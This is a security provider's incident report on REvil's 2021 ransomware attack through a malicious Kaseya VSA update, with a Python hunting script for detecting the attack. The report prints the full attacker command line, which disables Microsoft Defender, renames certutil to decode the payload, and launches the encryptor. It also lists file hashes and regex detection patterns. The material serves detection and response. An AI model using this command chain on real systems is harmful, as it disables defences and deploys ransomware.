REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update
Incident Report for CyFlare
Resolved

Posted Date: 07/02/2021

Published Date: 07/02/2021

Source: Kaseya

Sector: Information Technology & Information Security

DATE(S) ISSUED: 07/02/2021

SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group

OVERVIEW:
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.

The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.

MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.

While at the time of writing, it is unclear how widespread the incident is, security firm Huntress Labs is reporting that at least four MSPs have been hit so far. However, VSA is also used by regular businesses to manage large computer fleets, meaning the incident is also most likely impacting non-MSP entities as well.

According to security firm Sophos, which has also detected the attack via its antivirus telemetry, victims appear to be getting infected with ransomware via a malicious update to Kaseya VSA on-prem servers that disables local antivirus solutions and then deploys a fake Windows Defender app that encrypts local files.”

References:
https://www.msspalert.com/cybersecurity-breaches-and-attacks/kaseya-rmm-cyberattack-warning/
https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/
https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689


THREAT INTELLIGENCE:
“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say "Kaseya has been hacked" without evidence).”

Kaseya's official recommendation is to: "IMMEDIATELY shutdown your VSA server until you receive further notice from us.

We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It's critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”

SYSTEMS AFFECTED: Kaseya VSA Servers - Windows

RISK:
Managed Service Providers (MSPs), and any company that uses Kaseya VSA to provide remote IT services or remote access to other organizations' systems, are exposed to this threat: a compromised VSA server can push the malicious "update" to every endpoint that server manages.

Kaseya VSA is also used directly by medium and large businesses to manage their own computer fleets, so the attack is not limited to MSPs; non-MSP entities are affected as well.

TECHNICAL SUMMARY:
Validated indicators of compromise known at this time:
Ransomware encryptor is dropped to c:\kworking\agent.exe
The VSA procedure is named "Kaseya VSA Agent Hot-fix"
At least two tasks run the following command. It sleeps by pinging the loopback address 4979 times, disables Microsoft Defender real-time and related protections with Set-MpPreference, copies certutil.exe to C:\Windows\cert.exe and appends a random value so the copy's hash differs from the original, base64-decodes c:\kworking\agent.crt into agent.exe with the renamed certutil, deletes the intermediate files, and finally launches the encryptor:
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Other possible Indicators of Compromise (IOCs) identified (VirusTotal file details for the ransomware encryptor):
MD5: 561cffbaba71a6e8cc1cdceda990ead4
SHA-1: 5162f14d75e96edb914d1756349d6e11583db0b0
SHA-256: d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
Vhash: 095056655d15656az47!z
Authentihash: c9d30e7bf92c0bb67331c3526580a45d8446c785e4c671f55c957f53b285158f
Imphash: 59349b1648eddf021c01f05a17a0e870
Rich PE header hash: 60c050aad9e163c9893ac438cc74b2bf
SSDEEP: 24576:vMz7ETDWX4XukZeVL/kYx9P/JY6gfjcsAE:kfF7k4pB/JYPIsAE
TLSH: T1D915BF03F6C199B2F5DF013960B2577E8D3AAE158729D9D39B9038668D312D06B3F389
File type: Win32 EXE
Magic: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
TrID: Windows Control Panel Item (generic) (88.3%); Win64 Executable (generic) (4.7%); Win16 NE executable (generic) (2.2%); Win32 Executable (generic) (2%); OS/2 Executable (generic) (0.9%)
File size: 890.88 KB (912264 bytes)
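The indicators above can be hunted for in two ways: by hash (exact, but defeated the moment the payload is rebuilt) and by behaviour (the ping-as-sleep, the Set-MpPreference tamper, the certutil copy-and-decode chain). The script below is an added example, not CyFlare's or Kaseya's tooling. It runs both checks over process-creation events and flags the procedure name from the summary. The attack command line is the one printed above; the sample events, host names and the event field names (host, image, command_line, hashes) are constructed here and are an assumption about how an EDR exports its telemetry.

```python
import re
from dataclasses import dataclass, field

# Validated indicators taken from the advisory above.  The hashes are the
# ones listed for the encryptor dropped at c:\kworking\agent.exe.
IOC_DROP_PATH = r"c:\kworking\agent.exe"
IOC_PROCEDURE_NAME = "Kaseya VSA Agent Hot-fix"
IOC_HASHES = {
    "561cffbaba71a6e8cc1cdceda990ead4",                                  # MD5
    "5162f14d75e96edb914d1756349d6e11583db0b0",                          # SHA-1
    "d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e",  # SHA-256
}

# Behaviours lifted from the one-liner in the advisory.  A rebuilt payload
# changes every hash above; it does not change this tradecraft.
BEHAVIOUR_PATTERNS = {
    # loopback ping with a 3+ digit count is a sleep, not a connectivity check
    "ping_sleep": re.compile(r"\bping\s+127\.0\.0\.1\s+-n\s+\d{3,}", re.I),
    # Defender real-time protection switched off in one Set-MpPreference call
    "defender_tamper": re.compile(
        r"Set-MpPreference\b[^&]*-DisableRealtimeMonitoring\s+\$true", re.I),
    # certutil.exe copied to C:\Windows\cert.exe (renamed LOLBin)
    "certutil_copy": re.compile(
        r"\bcopy\s+/Y\s+\S*certutil\.exe\s+\S*\\cert\.exe", re.I),
    # certutil (under either name) base64-decoding agent.crt into agent.exe
    "certutil_decode": re.compile(
        r"\bcert(?:util)?\.exe\s+-decode\s+\S*agent\.crt\s+\S*agent\.exe", re.I),
    # the drop path itself
    "drop_path": re.compile(re.escape(IOC_DROP_PATH), re.I),
}


@dataclass
class Finding:
    host: str
    severity: str
    behaviours: list = field(default_factory=list)
    hash_hits: list = field(default_factory=list)


def match_behaviours(command_line):
    """Names of the behavioural patterns present in one process command line."""
    return [name for name, rx in BEHAVIOUR_PATTERNS.items() if rx.search(command_line)]


def match_hashes(hashes):
    """Hashes (any algorithm, any case) that equal a listed IOC, lowercased."""
    return sorted(h.lower() for h in hashes if h.lower() in IOC_HASHES)


def classify(event):
    """One event -> Finding or None.  A hash hit, or two or more behaviours
    on the same command line, is 'high'; a single behaviour is 'review'."""
    behaviours = match_behaviours(event.get("command_line", ""))
    hash_hits = match_hashes(event.get("hashes", []))
    if hash_hits or len(behaviours) >= 2:
        severity = "high"
    elif behaviours:
        severity = "review"
    else:
        return None
    return Finding(event["host"], severity, behaviours, hash_hits)


def hunt(events):
    return [f for f in (classify(e) for e in events) if f is not None]


def suspicious_procedures(procedure_names):
    """VSA procedure history entries matching the name used in the attack."""
    return [p for p in procedure_names if p.strip().lower() == IOC_PROCEDURE_NAME.lower()]


# Command line as printed in the advisory (split only for readability).
ATTACK_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force '
    r'-MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)

# Constructed process-creation events (hosts and benign lines are invented).
SAMPLE_EVENTS = [
    {"host": "ws-finance-07", "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": ATTACK_CMD, "hashes": []},
    {"host": "ws-finance-07", "image": IOC_DROP_PATH, "command_line": IOC_DROP_PATH,
     "hashes": ["D55F983C994CAA160EC63A59F6B4250FE67FB3E8C43A388AEC60A4A6978E9F1E"]},
    {"host": "ws-it-01", "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil.exe -hashfile C:\temp\installer.msi SHA256", "hashes": []},
    {"host": "ws-it-02", "image": r"C:\WINDOWS\system32\cmd.exe",
     "command_line": r"cmd.exe /c ping 127.0.0.1 -n 4 > nul", "hashes": []},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding)
    print(suspicious_procedures(["Weekly Patch Scan", "Kaseya VSA Agent Hot-fix"]))
```

Only the two events from the managed host fire; the legitimate certutil use and the ordinary four-packet ping do not. The hash set is the brittle half of this: blocking one SHA-1 stops exactly one build of agent.exe, so the behavioural patterns are what should go into detection rules that outlive the sample.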

ACTIONS TAKEN:
The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.

At this time, we do not believe any of our customers utilizing Kaseya are compromised. This conclusion is the result of threat-hunting searches for the indicators of compromise listed above across each affected customer's environment and the security solutions CyFlare manages.

For our managed endpoint and SentinelOne MDR customers we have also implemented a global blacklist on one key IOC: the SHA-1 hash identified above as the Kaseya VSA ransomware encryptor.

As more details on this emerging threat arise through the cyber community or through Kaseya notices, your SOC will continue to address them. If there are any further updates, or any indication that one of our affected customers is compromised, we will engage you immediately.

If you have any further questions, comments, or concerns regarding this threat, please do not hesitate to contact your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.

Thank you for your cooperation.
Posted Jul 02, 2021 - 20:12 EDT
This incident affected: Breach Detection Service.